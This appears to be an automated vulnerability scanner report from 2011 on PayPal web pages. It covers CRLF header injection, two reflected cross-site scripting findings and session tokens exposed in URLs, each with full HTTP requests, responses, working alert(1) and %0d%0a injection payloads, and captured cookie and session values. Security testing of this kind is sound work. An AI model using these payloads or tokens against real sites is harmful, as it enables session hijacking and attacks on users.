The value of REST URL parameter 3 is copied into the Location response header. The payload b50b0%0d%0abd0e342aea8 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /js/Customer/b50b0%0d%0abd0e342aea8/baynote.js HTTP/1.1
Host: www.paypal.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Fri, 12 Aug 2011 13:48:50 GMT
Server: Apache
Location: https://www.paypalobjects.com/js/Customer/b50b0
bd0e342aea8/baynote.js
Content-Length: 279
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="https://www.paypalobjec
...[SNIP]...

2. Cross-site scripting (reflected) previous next
There are 2 instances of this issue:

/webapps/mpp/merchant [name of an arbitrarily supplied request parameter]
/webapps/mpp/website-payments-pro [name of an arbitrarily supplied request parameter]

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

2.1. https://www.paypal.com/webapps/mpp/merchant [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/webapps/mpp/merchant

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cb963"-alert(1)-"c89faa687fb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webapps/mpp/merchant?cb963"-alert(1)-"c89faa687fb=1 HTTP/1.1
Host: www.paypal.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.paypal.com/us/cgi-bin/searchscr?cmd=_sitewide-search
Cookie: KHcl0EuY7AKSMgfvHl7J5E7hPtK=OGXUOFHbwQ9WE3sALZ1qIFid-EZw9v8a_qL0LLVFCQKL5SI2sHzGcjrqppn1hBQoGV8q5Xx7qjDOH9OJ; cookie_check=yes; consumer_display=USER_HOMEPAGE%3d0%26USER_TARGETPAGE%3d0%26USER_FILTER_CHOICE%3d0%26BALANCE_MODULE_STATE%3d1%26GIFT_BALANCE_MODULE_STATE%3d1%26LAST_SELECTED_ALIAS_ID%3d0%26SELLING_GROUP%3d1%26PAYMENT_AND_RISK_GROUP%3d1%26SHIPPING_GROUP%3d1; navlns=0.0; Apache=10.190.9.198.1313112159974960; cwrClyrK4LoCV1fydGbAxiNL6iG=%7cPUUJ8n6svxMPOYKuqe4Vt8wKSbX_g466vH_UPgXVt-HMeJJOUdE5GhABxWNHI64TAYVLkG%7cPFIMUwP8WbNWGTAGHvoHa36exDF_hTyF_U5S0DvwX2i_d0j2TxNo6Hbmi4Kwm3FyHIafJG%7c; s_sess=%20s_cc%3Dtrue%3B%20s_ppv%3D0%3B%20tr_p1%3Dsite%2520wide%2520search%2520results%3B%20v20%3Dxss%3B%20v31%3DD%253DpageName%3B%20SC_LINKS%3Dsite%2520wide%2520search%2520results%255E%255EBusiness%255E%255Esite%2520wide%2520search%2520results%2520%257C%2520Business%255E%255E%3B%20s_sq%3Dpaypalglobal%253D%252526pid%25253Dsite%25252520wide%25252520search%25252520results%252526pidt%25253D1%252526oid%25253Dhttps%2525253A%2525252F%2525252Fmerchant.paypal.com%2525252Fcgi-bin%2525252Fmarketingweb%2525253Fcmd%2525253D_render-content%25252526content_ID%2525253Dmerchant%2525252Fhome%25252526nav%2525253D2%252526ot%25253DA%3B; s_pers=%20gpv_c43%3Dsite%2520wide%2520search%2520results%7C1313162363773%3B%20gpv_events%3DFailure%7C1313162365113%3B; navcmd=_render-content%26content_ID%3dmerchant%2fhome; cwrClyrK4LoCV1fydGbAxiNL6iG=MLQqxuwrfNB4GCgi5Tc5nJR8jQoFWYGnrVmOftTlbwLloOZ8AWj2pVAjVw2e_bZWPiiWgINZlRwMRCbOjtKn9n894IGC1O3m73c9x6j45AugHBvkMZ0i63Io-yJukjjq4BkaMm%7cPUUJ8n6svxMPOYKuqe4Vt8wKSbX_g466vH_UPgXVt-HMeJJOUdE5GhABxWNHI64TAYVLkG%7cPFIMUwP8WbNWGTAGHvoHa36exDF_hTyF_U5S0DvwX2i_d0j2TxNo6Hbmi4Kwm3FyHIafJG%7c1313160185

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 14:49:08 GMT
Server: Apache-Coyote/1.1
Cache-Control: must-revalidate
Cache-Control: proxy-revalidate
Cache-Control: no-cache
X-FRAME-OPTIONS: SAMEORIGIN
flag_logged_in: false
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Set-Cookie: SPARTAJSESSIONID=8c593daa7901b; Domain=.paypal.com; Path=/; Secure; HttpOnly
Set-Cookie: LANG=en_US%3BUS; Domain=.paypal.com; Path=/; Secure; HttpOnly
Set-Cookie: navlns=0.0; Domain=.paypal.com; Path=/; Secure; HttpOnly
Set-Cookie: analytics=IJ0X2tKrr5T79WVJjbx7MgwE.vsjA7CSun2l6qJd.74qoFaXLa93YgXg-e5-JQFT0OmRoDDsSHIXYqh6BFi6D.6M60Y1rFic98bhqUNchJeFDoktULJVF74Lu.3l44q3; Max-Age=631138519; Expires=Tue, 12-Aug-2031 11:04:27 GMT; Domain=.paypal.com; Path=/; Secure; HttpOnly
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Length: 23611

<!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="keywords" content="merchant services, merchant account services, business account "><meta name="description" content="From acc
...[SNIP]...
"Core Four Pane";
s.prop50="en_US";
s.server="mktg";
s.prop14="";
s.prop16="";
s.prop20="Unknown";
s.prop28="Unknown";
s.prop29="Unknown";
s.prop36="https://www.paypal.com/webapps/mpp/merchant?cb963"-alert(1)-"c89faa687fb=1";
s.prop43="https://www.paypal.com/us/cgi-bin/searchscr?cmd=_sitewide-search";
s.prop25="CoreFourPane:Version1";
/************ DO NOT ALTER ANYTHING BELOW THIS LINE ! *************/
var s_code=s
...[SNIP]...

2.2. https://www.paypal.com/webapps/mpp/website-payments-pro [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/webapps/mpp/website-payments-pro

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f8ef5"-alert(1)-"f388019ca12 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /webapps/mpp/website-payments-pro?f8ef5"-alert(1)-"f388019ca12=1 HTTP/1.1
Host: www.paypal.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://cms.paypal.com/us/cgi-bin/marketingweb?cmd=_render-content&content_ID=merchant/compare_wp_products
Cookie: KHcl0EuY7AKSMgfvHl7J5E7hPtK=OGXUOFHbwQ9WE3sALZ1qIFid-EZw9v8a_qL0LLVFCQKL5SI2sHzGcjrqppn1hBQoGV8q5Xx7qjDOH9OJ; cookie_check=yes; consumer_display=USER_HOMEPAGE%3d0%26USER_TARGETPAGE%3d0%26USER_FILTER_CHOICE%3d0%26BALANCE_MODULE_STATE%3d1%26GIFT_BALANCE_MODULE_STATE%3d1%26LAST_SELECTED_ALIAS_ID%3d0%26SELLING_GROUP%3d1%26PAYMENT_AND_RISK_GROUP%3d1%26SHIPPING_GROUP%3d1; navlns=0.0; Apache=10.190.9.198.1313112159974960; cwrClyrK4LoCV1fydGbAxiNL6iG=%7cPUUJ8n6svxMPOYKuqe4Vt8wKSbX_g466vH_UPgXVt-HMeJJOUdE5GhABxWNHI64TAYVLkG%7cPFIMUwP8WbNWGTAGHvoHa36exDF_hTyF_U5S0DvwX2i_d0j2TxNo6Hbmi4Kwm3FyHIafJG%7c; s_sess=%20v20%3Dxss%3B%20s_cc%3Dtrue%3B%20s_ppv%3D0%3B%20tr_p1%3Dmkt-cms%253Abiz%253Ageneral%253Acomparewpproducts%3B%20v31%3DD%253DpageName%3B%20SC_LINKS%3Dmkt-cms%253Abiz%253Ageneral%253Acomparewpproducts%255E%255E%252Fcms_content%252FUS%252Fen_US%252Fimages%252Fmerchant%252Fbtn_select_70x24.gif%255E%255Emkt-cms%253Abiz%253Ageneral%253Acomparewpproducts%2520%257C%2520%252Fcms_content%252FUS%252Fen_US%252Fimages%252Fmerchant%252Fbtn_select_70x24.gif%255E%255E%3B%20s_sq%3Dpaypalglobal%253D%252526pid%25253Dmkt-cms%2525253Abiz%2525253Ageneral%2525253Acomparewpproducts%252526pidt%25253D1%252526oid%25253Dhttps%2525253A%2525252F%2525252Fcms.paypal.com%2525252Fus%2525252Fcgi-bin%2525252F%2525253Fcmd%2525253D_render-content%25252526content_ID%2525253Dmerchant%2525252Fwp_pro%252526ot%25253DA%3B; s_pers=%20gpv_c43%3Dmkt-cms%253Abiz%253Ageneral%253Acomparewpproducts%7C1313162402821%3B%20gpv_events%3Dno%2520value%7C1313162404332%3B; navcmd=_render-content%26content_ID%3dmerchant%2fhome; cwrClyrK4LoCV1fydGbAxiNL6iG=MLQqxuwrfNB4GCgi5Tc5nJR8jQoFWYGnrVmOftTlbwLloOZ8AWj2pVAjVw2e_bZWPiiWgINZlRwMRCbOjtKn9n894IGC1O3m73c9x6j45AugHBvkMZ0i63Io-yJukjjq4BkaMm%7cPUUJ8n6svxMPOYKuqe4Vt8wKSbX_g466vH_UPgXVt-HMeJJOUdE5GhABxWNHI64TAYVLkG%7cPFIMUwP8WbNWGTAGHvoHa36exDF_hTyF_U5S0DvwX2i_d0j2TxNo6Hbmi4Kwm3FyHIafJG%7c1313160185; SPARTAJSESSIONID=8c593daa7901b; LANG=en_US%3BUS; analytics=bHHouPi7Z8x.36xfS4fKP9XDXTTS5NWYsXai52vu4P1bM1.P0RsJRdSYpkHkedHRjEZTIeLMAfLIA5yYXFusfzCuEy-qQTzEm73lShwLhKjd9RfPwfOfqYXOnhxdkaJ3

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 14:49:57 GMT
Server: Apache-Coyote/1.1
Cache-Control: must-revalidate
Cache-Control: proxy-revalidate
Cache-Control: no-cache
X-FRAME-OPTIONS: SAMEORIGIN
flag_logged_in: false
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Set-Cookie: SPARTAJSESSIONID=8c593daa7901b; Domain=.paypal.com; Path=/; Secure; HttpOnly
Set-Cookie: LANG=en_US%3BUS; Domain=.paypal.com; Path=/; Secure; HttpOnly
Set-Cookie: navlns=0.0; Domain=.paypal.com; Path=/; Secure; HttpOnly
Set-Cookie: analytics=o6F2u1hJflDUHGx-ZO7cztlWbOSDoOq1I5GVIAM4bNHFYwVXxpaWtrvixykCQZqs37F-AjD2q3O6B14hKH5LiYa3KijuaYzOajgjSRkEuDmson00KNUO7IXBHNn8kwSv; Max-Age=631138519; Expires=Tue, 12-Aug-2031 11:05:16 GMT; Domain=.paypal.com; Path=/; Secure; HttpOnly
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Length: 523054

<!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="keywords" content="payment processing, online payment processing, website payments pro"><meta name="description" content="A me
...[SNIP]...
iew";
s.prop50="en_US";
s.server="mktg";
s.prop14="";
s.prop16="";
s.prop20="Unknown";
s.prop28="Unknown";
s.prop29="Unknown";
s.prop36="https://www.paypal.com/webapps/mpp/website-payments-pro?f8ef5"-alert(1)-"f388019ca12=1";
s.prop43="https://cms.paypal.com/us/cgi-bin/marketingweb?cmd=_render-content&content_ID=merchant/compare_wp_products";
s.prop37="::test-phoneonly";
s.prop25="mktg:hss:wppro::overview:::test-pho
...[SNIP]...

3. Session token in URL previous next
There are 5 instances of this issue:

/cgi-bin/webscr
/cgi-bin/webscr
/helpcenter/main.jsp
/us/cgi-bin/searchscr
/us/cgi-bin/webscr

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.

3.1. https://www.paypal.com/cgi-bin/webscr previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://www.paypal.com
Path:	/cgi-bin/webscr

Issue detail

The URL in the request appears to contain a session token within the query string:

https://www.paypal.com/cgi-bin/webscr?cmd=_flow&SESSION=M5rZd4ZZP2gDMdA2Lu9sOXevrynrQioy9AyKX2bWrhn8uW2M5rNBXVN3X5S&dispatch=5885d80a13c0db1f8e263663d3faee8d1e83f46a36995b3856cef1e18897ad75

Request

GET /cgi-bin/webscr?cmd=_flow&SESSION=M5rZd4ZZP2gDMdA2Lu9sOXevrynrQioy9AyKX2bWrhn8uW2M5rNBXVN3X5S&dispatch=5885d80a13c0db1f8e263663d3faee8d1e83f46a36995b3856cef1e18897ad75 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: https://www.x.com/docs/DOC-1106
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.paypal.com
Connection: Keep-Alive
Cookie: Apache=10.190.9.182.1313112145907951; cwrClyrK4LoCV1fydGbAxiNL6iG=1TXdfYncNPc3OcD3Vsp-sRufuL3kUsQnhEsK-BH5G3gLLDL8WGcZPKWGrDD6_6l8I1pt6X-fwoKmBt7vIY6NL2TJZdpgPlQVHwZ5pVay3LVd9zvWkFFJoMJWStPARnvQ-YGZxW%7cTVA53jSrvERuvSOA7_C6IChutrh77kYpu3GedjoIiNmPvAnuOJU8fImIicwetHt5acDUK0%7cJlqiLcugqxkWGPBl-i2C6vvtUDhrLAULkRZ2TAS5a_kkPTjurigT_b3zi1uzMvpM59ThLG%7c1313156416; navcmd=_account-authenticate-login; pNTcMTtQfrJuaJiwEnWXQ6yNxfq=rkknIxowhDJJRVrakrbrUE1pUOu7kJzzA_4bPaOG0nlYjAwdoYy4a1hPMYvE-pZNF13eAdV2ig7kqd3_wUXFa_XGTQzQVftIXYb3RRgw3C3jdCTMSMf7vo-vIS7x70bDKinfjBxvk37xjDOQ28D8E7rg7bzc68YfPppB-QGUq02WEOcgmj1yFoamLtz6MEvGXprCv2fN5SwWBRffW3RibIetvQhosY5xsnvdAqmB9yswGpmaqk7c1rZjfAffjbs-UA23j2oRoyGtuXPPWoxcD0SujLxjLbwX225-eJ1NTrH0_X9lNc0T0twK0uTTfE7ieTFk8v8MtoHfMfBgPSUUd1jgyL8FWh2VldtR78-QovPoSs9hxaAc0DID5UxpxDo8eVJ5_I-Jp_YDrmM7UDLG6ESd-FDo9NqFFsZXw6MpH1WD5zO4lM1ZuqzodJAZNekNa3jiz_efcS78DaCNdMFx6kHDkw1KnlfGyUGcFl-sNkRc9Qe9NwJn8hCDP7e; KHcl0EuY7AKSMgfvHl7J5E7hPtK=ST3y3Iw9S565SZinIAGKcJZFrmQ4AAlG4kUTV6c4B_buhBjHckuBGvqZh9nhOaGpKgI7-mRZkucmxeTt; cookie_check=yes; consumer_display=USER_HOMEPAGE%3d0%26USER_TARGETPAGE%3d0%26USER_FILTER_CHOICE%3d0%26BALANCE_MODULE_STATE%3d1%26GIFT_BALANCE_MODULE_STATE%3d1%26LAST_SELECTED_ALIAS_ID%3d0%26SELLING_GROUP%3d1%26PAYMENT_AND_RISK_GROUP%3d1%26SHIPPING_GROUP%3d1; navlns=0.0; help_cookie=

Response

3.2. https://www.paypal.com/cgi-bin/webscr previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://www.paypal.com
Path:	/cgi-bin/webscr

Issue detail

The response contains the following links that appear to contain session tokens:

https://www.x.com/index.jspa?ssocancel=true&token=HA-KJ8ZLGBZ3CZ96

Request

Response

3.3. https://www.paypal.com/helpcenter/main.jsp previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://www.paypal.com
Path:	/helpcenter/main.jsp

Issue detail

The response contains the following links that appear to contain session tokens:

https://www.paypal.com/helpcenter/main.jsp;jsessionid=XZRYTFvQWhRYGhbn9hdczQlQ1JN1tlvCrLp0pqF1Vynzlw18GjST!1180094210?versionpath=HELPWEB-640-20110207-1&_dyncharset=UTF-8&cmd=_help&countrycode=US&dosearch=true&t=searchTab&searchstring=All&locale=en_US&sidetopic=11400003
https://www.paypal.com/helpcenter/main.jsp;jsessionid=XZRYTFvQWhRYGhbn9hdczQlQ1JN1tlvCrLp0pqF1Vynzlw18GjST!1180094210?versionpath=HELPWEB-640-20110207-1&_dyncharset=UTF-8&cmd=_help&countrycode=US&dosearch=true&t=searchTab&searchstring=All&locale=en_US&sidetopic=11400009
https://www.paypal.com/helpcenter/main.jsp;jsessionid=XZRYTFvQWhRYGhbn9hdczQlQ1JN1tlvCrLp0pqF1Vynzlw18GjST!1180094210?versionpath=HELPWEB-640-20110207-1&_dyncharset=UTF-8&cmd=_help&countrycode=US&dosearch=true&t=searchTab&searchstring=All&locale=en_US&sidetopic=11400015
https://www.paypal.com/helpcenter/main.jsp;jsessionid=XZRYTFvQWhRYGhbn9hdczQlQ1JN1tlvCrLp0pqF1Vynzlw18GjST!1180094210?versionpath=HELPWEB-640-20110207-1&_dyncharset=UTF-8&cmd=_help&countrycode=US&dosearch=true&t=searchTab&searchstring=All&locale=en_US&sidetopic=11400021
https://www.paypal.com/helpcenter/main.jsp;jsessionid=XZRYTFvQWhRYGhbn9hdczQlQ1JN1tlvCrLp0pqF1Vynzlw18GjST!1180094210?versionpath=HELPWEB-640-20110207-1&_dyncharset=UTF-8&cmd=_help&countrycode=US&dosearch=true&t=searchTab&searchstring=All&locale=en_US&sidetopic=11400029
https://www.paypal.com/helpcenter/main.jsp;jsessionid=XZRYTFvQWhRYGhbn9hdczQlQ1JN1tlvCrLp0pqF1Vynzlw18GjST!1180094210?versionpath=HELPWEB-640-20110207-1&_dyncharset=UTF-8&cmd=_help&countrycode=US&dosearch=true&t=searchTab&searchstring=All&locale=en_US&sidetopic=11400035
https://www.paypal.com/helpcenter/main.jsp;jsessionid=XZRYTFvQWhRYGhbn9hdczQlQ1JN1tlvCrLp0pqF1Vynzlw18GjST!1180094210?versionpath=HELPWEB-640-20110207-1&_dyncharset=UTF-8&cmd=_help&countrycode=US&dosearch=true&t=searchTab&searchstring=All&locale=en_US&sidetopic=11400043
https://www.paypal.com/us/cgi-bin/helpscr;jsessionid=XZRYTFvQWhRYGhbn9hdczQlQ1JN1tlvCrLp0pqF1Vynzlw18GjST!1180094210?t=escalateTab&cmd=_help&locale=en_US&countrycode=US

Request

GET /helpcenter/main.jsp?t=searchTab&dosearch=true&locale=en_US&_dyncharset=UTF-8&countrycode=US&cmd=_help&searchstring=All About PayPal&m=BT HTTP/1.1
Host: www.paypal.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:48:31 GMT
Server: Apache
Set-Cookie: help_cookie=; expires=Mon, 19-Sep-2011 01:48:32 GMT; domain=paypal.com; path=/; Secure; HttpOnly
Set-Cookie: feel_cookie=a%205%20_help%20b%200%20%20c%207%20helpscr%20d%200%20%20e%200%20%20f%200%20%20g%205%20en_US%20h%200%20%20i%2030%20xpt%2fHelp%2fhelpcenter%2fHelpCenter%20j%200%20%20k%2066%20PayPal%20Help%20Center%20-%20Get%20Answers%20to%20Your%20PayPal%20Questions%20-%20PayPal%20l%200%20%20; expires=Wed, 31-Dec-1969 23:59:59 GMT; path=/; Secure; HttpOnly
Vary: Accept-Encoding
Strict-Transport-Security: max-age=500
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:ns0="og" lang="en" ns0:xmlns="http://ogp.me/ns#"><head>
<meta http-equiv="Conte
...[SNIP]...
<li>


       <a href="/helpcenter/main.jsp;jsessionid=XZRYTFvQWhRYGhbn9hdczQlQ1JN1tlvCrLp0pqF1Vynzlw18GjST!1180094210?versionpath=HELPWEB-640-20110207-1&_dyncharset=UTF-8&cmd=_help&countrycode=US&dosearch=true&t=searchTab&searchstring=All&locale=en_US&sidetopic=11400003">
           All About PayPal
       </a>
...[SNIP]...
<li>


       <a href="/helpcenter/main.jsp;jsessionid=XZRYTFvQWhRYGhbn9hdczQlQ1JN1tlvCrLp0pqF1Vynzlw18GjST!1180094210?versionpath=HELPWEB-640-20110207-1&_dyncharset=UTF-8&cmd=_help&countrycode=US&dosearch=true&t=searchTab&searchstring=All&locale=en_US&sidetopic=11400009">
           Disputes and Claim
       </a>
...[SNIP]...
<li>


       <a href="/helpcenter/main.jsp;jsessionid=XZRYTFvQWhRYGhbn9hdczQlQ1JN1tlvCrLp0pqF1Vynzlw18GjST!1180094210?versionpath=HELPWEB-640-20110207-1&_dyncharset=UTF-8&cmd=_help&countrycode=US&dosearch=true&t=searchTab&searchstring=All&locale=en_US&sidetopic=11400015">
           Merchant
       </a>
...[SNIP]...
<li>


       <a href="/helpcenter/main.jsp;jsessionid=XZRYTFvQWhRYGhbn9hdczQlQ1JN1tlvCrLp0pqF1Vynzlw18GjST!1180094210?versionpath=HELPWEB-640-20110207-1&_dyncharset=UTF-8&cmd=_help&countrycode=US&dosearch=true&t=searchTab&searchstring=All&locale=en_US&sidetopic=11400021">
           My Account
       </a>
...[SNIP]...
<li>


       <a href="/helpcenter/main.jsp;jsessionid=XZRYTFvQWhRYGhbn9hdczQlQ1JN1tlvCrLp0pqF1Vynzlw18GjST!1180094210?versionpath=HELPWEB-640-20110207-1&_dyncharset=UTF-8&cmd=_help&countrycode=US&dosearch=true&t=searchTab&searchstring=All&locale=en_US&sidetopic=11400029">
           My Money
       </a>
...[SNIP]...
<li>


       <a href="/helpcenter/main.jsp;jsessionid=XZRYTFvQWhRYGhbn9hdczQlQ1JN1tlvCrLp0pqF1Vynzlw18GjST!1180094210?versionpath=HELPWEB-640-20110207-1&_dyncharset=UTF-8&cmd=_help&countrycode=US&dosearch=true&t=searchTab&searchstring=All&locale=en_US&sidetopic=11400035">
           Payments
       </a>
...[SNIP]...
<li class="last">


               <a href="/helpcenter/main.jsp;jsessionid=XZRYTFvQWhRYGhbn9hdczQlQ1JN1tlvCrLp0pqF1Vynzlw18GjST!1180094210?versionpath=HELPWEB-640-20110207-1&_dyncharset=UTF-8&cmd=_help&countrycode=US&dosearch=true&t=searchTab&searchstring=All&locale=en_US&sidetopic=11400043">
           Products and Services
       </a>
...[SNIP]...
<span>
       <a href="/us/cgi-bin/helpscr;jsessionid=XZRYTFvQWhRYGhbn9hdczQlQ1JN1tlvCrLp0pqF1Vynzlw18GjST!1180094210?t=escalateTab&cmd=_help&locale=en_US&countrycode=US">Contact us</a>
...[SNIP]...

3.4. https://www.paypal.com/us/cgi-bin/searchscr previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://www.paypal.com
Path:	/us/cgi-bin/searchscr

Issue detail

The URL in the request appears to contain a session token within the query string:

https://www.paypal.com/us/cgi-bin/searchscr?cmd=_sitewide-search&SESSION=4UAE7cJx7FDT9aWE8iaQdX1WLgO1TKkcr8pShIIQXF0D098vCpHiEl6YT9q

Request

GET /us/cgi-bin/searchscr?cmd=_sitewide-search&SESSION=4UAE7cJx7FDT9aWE8iaQdX1WLgO1TKkcr8pShIIQXF0D098vCpHiEl6YT9q HTTP/1.1
Host: www.paypal.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:48:21 GMT
Server: Apache
Set-Cookie: feel_cookie=a%2016%20_sitewide-search%20b%205%20_help%20c%209%20searchscr%20d%207%20helpscr%20e%200%20%20f%200%20%20g%205%20en_US%20h%205%20en_US%20i%2042%20xpt%2fCustomer%2fgeneral%2fSearchResultsRedesign%20j%2023%20xpt%2fHelp%2fhelpcenter%2fHC1%20k%2023%20Search%20Results%20-%20PayPal%20l%2066%20PayPal%20Help%20Center%20-%20Get%20Answers%20to%20Your%20PayPal%20Questions%20-%20PayPal%20; expires=Wed, 31-Dec-1969 23:59:59 GMT; path=/; Secure; HttpOnly
Vary: Accept-Encoding
Strict-Transport-Security: max-age=500
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 11565

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:ns0="og" lang="en" ns0:xmlns="http://ogp.me/ns#"><head>
<meta http-equiv="Conte
...[SNIP]...

3.5. https://www.paypal.com/us/cgi-bin/webscr previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://www.paypal.com
Path:	/us/cgi-bin/webscr

Issue detail

The URL in the request appears to contain a session token within the query string:

https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&SESSION=SP8KJv_7wOApJtOTsPyQlLJdrbERBAReTlLEVuhHeOeJgoxcELOv9kZexjS&dispatch=5885d80a13c0db1f8e263663d3faee8d1e83f46a36995b3856cef1e18897ad75

Request

GET /us/cgi-bin/webscr?cmd=_flow&SESSION=SP8KJv_7wOApJtOTsPyQlLJdrbERBAReTlLEVuhHeOeJgoxcELOv9kZexjS&dispatch=5885d80a13c0db1f8e263663d3faee8d1e83f46a36995b3856cef1e18897ad75 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Encoding: gzip, deflate
